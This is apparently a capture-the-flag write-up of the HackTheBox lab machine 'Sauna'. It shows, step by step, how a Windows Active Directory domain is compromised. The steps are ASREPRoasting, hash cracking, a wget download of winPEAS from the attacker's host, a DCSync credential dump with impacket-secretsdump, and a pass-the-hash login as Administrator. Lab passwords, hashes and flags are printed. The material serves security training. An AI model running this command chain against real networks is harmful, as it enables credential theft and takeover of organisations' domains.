HackTheBox Sauna
Writeup for HackTheBox Sauna
HackTheBox Sauna
Machine Synopsis
Sauna is an easy difficulty Windows machine that features Active Directory enumeration and exploitation. Possible usernames can be derived from employee full names listed on the website. With these usernames, an ASREPRoasting attack can be performed, which results in hash for an account that does not require Kerberos pre-authentication. This hash can be subjected to an offline brute force attack, in order to recover the plaintext password for a user that is able to WinRM to the box. Running WinPEAS reveals that another system user has been configured to automatically login and it identifies their password. This second user also has Windows remote management permissions. BloodHound reveals that this user has the DS-Replication-Get-Changes-All extended right, which allows them to dump password hashes from the Domain Controller in a DCSync attack. Executing this attack returns the hash of the primary domain administrator, which can be used with Impacket psexec.py in order to gain a shell on the box as NT_AUTHORITY\SYSTEM. (Source)
Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
❯ nmap -p- --min-rate 10000 10.10.10.175
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49677/tcp open unknown
49689/tcp open unknown
49696/tcp open unknown
❯ nmap -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49677,49689,49696 -sC -sV 10.10.10.175
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-06 11:42:41Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49677/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49696/tcp open msrpc Microsoft Windows RPC
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h44m13s
| smb2-time:
| date: 2025-02-06T11:43:34
|_ start_date: N/A
1
❯ echo -e '10.10.10.175\tEGOTISTICAL-BANK.LOCAL0 EGOTISTICAL-BANK.LOCAL' | sudo tee -a /etc/hosts
Here is the website.
There are several names listed on the website. Lets take note of them.
1
2
3
4
5
6
7
❯ cat users.txt
Fergus Smith
Shaun Coins
Hugo Bear
Bowie Taylor
Steven Kerb
Sophie Driver
Using this GitHub repository, we can generate a list of possible usernames.
1
2
❯ git clone https://github.com/urbanadventurer/username-anarchy
❯ ./username-anarchy --input-file ../users.txt > usernames.txt
Use kerbrute to find the list of valid users.
1
2
3
4
5
❯ kerbrute -domain EGOTISTICAL-BANK.LOCAL -users usernames.txt -dc-ip "10.10.10.175"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Valid user => fsmith [NOT PREAUTH]
[*] No passwords were discovered :'(
It appears that we got a hit on fsmith.
Exploitation
Lets try to use impacket-NPUsers to get any non-preauth AS_REP responses.
1
2
3
❯ impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/ -usersfile usernames.txt -no-pass -dc-ip "10.10.10.175"
...
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:48fe8f092c6487f6f82bd885b06dab73$9613a140215ac0f7b808865c068c9d699eccbea3d6e4359d46e510e5bae457833948c741242a6f5b71f0a5acd6db62640c405c25b17a7dead934b1b9c2a5366b99968b2256fe1e554787365456a900e8d42642055f40b54cc0d1baaaa7deee0512310fb00904b77faa20df26db3e9f473949dea8b33eb737e3ced723a1d447ba3141c34a978e25fe8db451468a23f0112418353dd0c0f40daf990581e79537b927e42fe2526408b3d28a8f0b322a40a06ae65c0fbbfaf233c11fe5522e77977d90feca506a9d299cbf847b9d4c009d8cc7032b67d877a18cafbced4bb9d3447c0b385d41a916f47edb1c7286265f4c8549366e2781999c8f14baac3967ae5de4
Crack the hash using john.
1
2
3
4
❯ john fsmith_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
...
Thestrokes23 ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)
Session completed.
Lets login to winrm as fsmith.
1
2
3
4
❯ evil-winrm -i 10.10.10.175 -P 5985 -u fsmith -p 'Thestrokes23'
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
b84a60fef34f080262db6039c9a92afb
Privilege Escalation
Using Winpeas, we were able to find AutoLogon credentials for SVC_LOANMGR.
1
2
3
4
5
6
7
8
9
*Evil-WinRM* PS C:\Users\FSmith\Desktop> wget http://10.10.16.4/winPEASany.exe -outfile winpeas.exe
*Evil-WinRM* PS C:\Users\FSmith\Desktop> ./winpeas.exe
...
ÉÍÍÍÍÍÍÍÍÍ͹ Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultDomainName : EGOTISTICALBANK
DefaultUserName : EGOTISTICALBANK\svc_loanmanager
DefaultPassword : Moneymakestheworldgoround!
...
Password Moneymakestheworldgoround! found for EGOTISTICALBANK\svc_loanmanager!
Collect the domain information using Bloodhound.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
❯ /usr/bin/bloodhound-python -u fsmith -p "Thestrokes23" -d EGOTISTICAL-BANK.LOCAL -ns 10.10.10.175 -c All
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: egotistical-bank.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (SAUNA.EGOTISTICAL-BANK.LOCAL:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Found 7 users
INFO: Found 52 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SAUNA.EGOTISTICAL-BANK.LOCAL
INFO: Done in 00M 03S
Analyzing the Bloodhound graph, we can observe that SVC_LOANMGR has also DCSync, GetChangesAll and GetChanges permissions to the domain.
Given this, we can dump the secrets as SVC_LOANMGR.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
❯ impacket-secretsdump 'EGOTISTICAL-BANK.local/svc_loanmgr:Moneymakestheworldgoround!'@10.10.10.175
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:d9a2c0338047dd5b99318dd43bb3123b:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:f52280e9e61be8d50d3aaead2a95215a5a22d47371049ed76571ad44ef7653a2
SAUNA$:aes128-cts-hmac-sha1-96:cf1799d0913c1e909231e956e72c2954
SAUNA$:des-cbc-md5:cd7f6d75cb7f1f2f
[*] Cleaning up...
With the secrets dumped, we can login as administrator.
1
2
3
4
❯ evil-winrm -i 10.10.10.175 -u Administrator -H "823452073d75b9d1cf70ebdf86c7f98e"
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
cafb18273b8d23906e6de535509a022c
This post is licensed under CC BY 4.0 by the author.